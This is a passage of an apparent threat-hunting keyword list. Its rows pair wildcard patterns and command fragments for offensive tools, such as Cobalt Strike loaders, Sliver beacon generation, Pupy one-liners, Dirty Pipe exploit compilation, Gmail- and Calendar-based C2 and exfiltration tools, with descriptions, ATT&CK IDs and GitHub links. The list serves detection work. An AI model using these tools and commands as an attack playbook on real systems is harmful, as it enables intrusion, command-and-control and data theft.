T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,0,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z -*g_hookedSleep.*,offensive_tool_keyword,C2 related tools,An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*g0h4n/RDE1*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - 
TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,1,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*g0h4n/REC2*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*G0ldenGunSec/GetWebDAVStatus*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,1,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*g0tmi1k*,offensive_tool_keyword,Github Username,Github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/g0tmi1k,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*g3tsyst3m/undertheradar*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass 
techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,1,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*gabriellandau/PPLFault*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*GadgetToJScript.csproj*,offensive_tool_keyword,GadgetToJScript,A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,1,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z -*GadgetToJScript.exe -a *,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,0,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*GadgetToJScript.sln*,offensive_tool_keyword,GadgetToJScript,A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,1,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z -*GadgetToJScript-master*,offensive_tool_keyword,GadgetToJScript,A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.,T1059.001 - T1078 - T1059.005,TA0002 - TA0004 - TA0001,N/A,N/A,Exploitation tools,https://github.com/med0x2e/GadgetToJScript,1,1,N/A,10,8,777,157,2021-07-26T17:35:40Z,2019-10-05T12:27:19Z -*Gality369/CS-Loader*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*GateTrampolin.asm*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*gateway-finder*,offensive_tool_keyword,gateway-finder-imp,This is an improved version of original Gateway-finder. New version rebuilt with python3 and support for files with MACs/IPs The homepage of original project is: http://pentestmonkey.net/tools/gateway-finder Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.,T1016 - T1049 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Data Exfiltration,https://github.com/whitel1st/gateway-finder-imp,1,0,N/A,N/A,1,57,7,2020-12-14T09:52:29Z,2018-04-18T12:43:11Z -*gather/keylogger*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*gather/ldap_query*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*gather/peass.rb*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*gather/user_hunter*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*gatherer/gatherer.py*,offensive_tool_keyword,jackdaw,Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.,T1595 T1590 T1591,TA0001 - TA0002 - TA0007 - TA0008 - TA0011,N/A,N/A,Reconnaissance,https://github.com/skelsec/jackdaw,1,1,N/A,N/A,6,532,88,2023-07-19T16:21:49Z,2019-03-27T18:36:41Z -*gato * attack*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,0,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*gato * enumerate*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,0,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*gato * --http-proxy*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,0,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*gato * --socks-proxy*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,0,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*gbfgfbopcfokdpkdigfmoeaajfmpkbnh*,greyware_tool_keyword,westwind,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*gbmdmipapolaohpinhblmcnpmmlgfgje*,greyware_tool_keyword,Unblock Websites,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data 
Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*gc2-sheet.go*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,1,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -*GC2-sheet/cmd*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,1,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -*gcat*implant.py*,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,1,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*gcat.is.the.shit@gmail.com*,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,0,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*gcc cve_2022_0847.c -o exploit*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ahrixia/CVE_2022_0847,1,0,N/A,N/A,1,21,15,2022-03-08T13:15:35Z,2022-03-08T12:43:43Z -*gcc dirtypipez.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1533,TA0003,N/A,N/A,Exploitation 
tools,https://github.com/febinrev/dirtypipez-exploit,1,0,N/A,N/A,1,41,21,2022-03-08T11:52:22Z,2022-03-08T11:49:40Z -*gci -h C:\pagefile.sys*,greyware_tool_keyword,powershell,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*gcknhkkoolaabfmlnjonogaaifnjlfnp*,greyware_tool_keyword,FoxyProxy Standard,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*gconv-modules*,offensive_tool_keyword,POC,Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/Ayrx/CVE-2021-4034,1,0,N/A,N/A,1,97,16,2022-01-27T11:57:05Z,2022-01-26T03:33:47Z -*gcp_functionalc2.profile*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,1,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*GCPBucketBrute*,offensive_tool_keyword,GCPBucketBrute,A script to enumerate Google Storage buckets. determine what access you have to them. 
and determine if they can be privilege escalated,T1083 - T1553 - T1210 - T1213,TA0001 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://github.com/RhinoSecurityLabs/GCPBucketBrute,1,0,N/A,N/A,5,406,82,2023-05-26T19:11:42Z,2019-02-26T03:56:22Z -*GCR - Google Calendar RAT*,offensive_tool_keyword,GCR-Google-Calendar-RAT,Google Calendar RAT is a PoC of Command&Control over Google Calendar Events,T1071.001 - T1021.002 - T1059,TA0002 - TA0005,N/A,N/A,C2,https://github.com/MrSaighnal/GCR-Google-Calendar-RAT,1,1,N/A,10,10,78,15,2023-06-26T09:04:02Z,2023-06-18T13:23:31Z -*GCR-Google-Calendar-RAT*,offensive_tool_keyword,GCR-Google-Calendar-RAT,Google Calendar RAT is a PoC of Command&Control over Google Calendar Events,T1071.001 - T1021.002 - T1059,TA0002 - TA0005,N/A,N/A,C2,https://github.com/MrSaighnal/GCR-Google-Calendar-RAT,1,1,N/A,10,10,78,15,2023-06-26T09:04:02Z,2023-06-18T13:23:31Z -*geacon*/cmd/*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*geli2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*gemailhack.py*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/Ha3MrX/Gemail-Hack,1,1,N/A,7,9,813,385,2022-02-18T16:12:45Z,2018-04-19T13:48:41Z -*gen -f py bind --port*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*gen -f py_oneliner connect *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*genCrossC2 *,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*genCrossC2.*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*genCrossC2.Win.exe*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*Generalrecon -noninteractive*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*generate beacon --mtls *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate exe Shadow*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,0,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*generate --http http*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate 
